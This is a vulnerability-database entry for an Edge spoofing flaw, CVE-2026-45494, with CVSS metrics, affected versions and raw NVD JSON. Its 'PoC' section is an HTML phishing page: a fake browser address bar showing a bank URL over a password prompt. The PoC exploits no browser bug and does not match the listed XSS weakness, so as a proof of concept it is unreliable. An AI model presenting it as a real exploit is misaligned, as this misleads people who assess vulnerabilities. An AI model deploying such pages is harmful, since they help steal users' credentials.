Security Vulnerability Report
CVE-2026-45494 CVSS 5.4 MEDIUM

Published: 2026-05-18 18:17:38
Last Modified: 2026-05-19 15:06:38

Description

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:-:*:*:* - VULNERABLE
Microsoft Edge (Chromium-based) (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  PoC Concept for UI Spoofing in Microsoft Edge (Chromium-based)
  This code demonstrates how to create a fake address bar overlay.
  Note: This is for educational purposes only.
-->
<html>
<head>
<style>
  body {
    margin: 0;
    padding: 0;
    background-color: #fff;
    font-family: Arial, sans-serif;
  }
  /* Simulate the fake address bar */
  .fake-address-bar {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 30px;
    background-color: #f1f3f4;
    border-bottom: 1px solid #ccc;
    display: flex;
    align-items: center;
    padding: 0 10px;
    box-shadow: 0 2px 4px rgba(0,0,0,0.1);
    z-index: 9999;
  }
  .fake-url {
    background-color: #fff;
    border-radius: 15px;
    padding: 2px 15px;
    flex-grow: 1;
    margin-left: 10px;
    font-size: 12px;
    color: #202124;
    text-align: center;
  }
  .content {
    margin-top: 40px;
    padding: 20px;
    text-align: center;
  }
</style>
</head>
<body>
  <!-- Fake UI Element -->
  <div class="fake-address-bar">
    <span style="color: #5f6368;">🔒</span>
    <div class="fake-url">https://www.trusted-bank.com/login</div>
  </div>
  <!-- Phishing Content -->
  <div class="content">
    <h1>Security Check Required</h1>
    <p>Please re-enter your password to continue.</p>
    <input type="password" placeholder="Password" style="padding: 10px; width: 200px;">
    <br><br>
    <button style="padding: 10px 20px;">Submit</button>
  </div>
  <script>
    // Logic to capture interaction could go here
    console.log('Spoofing PoC loaded');
  </script>
</body>
</html>

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45494 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45494", "sourceIdentifier": "[email protected]", "published": "2026-05-18T18:17:38.390", "lastModified": "2026-05-19T15:06:38.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft Edge (Chromium-based) Spoofing Vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:-:*:*:*", "versionEndExcluding": "148.0.3967.70", "matchCriteriaId": "219AF9F0-FF7A-42E6-82A9-6D4D23FE0655"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45494", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}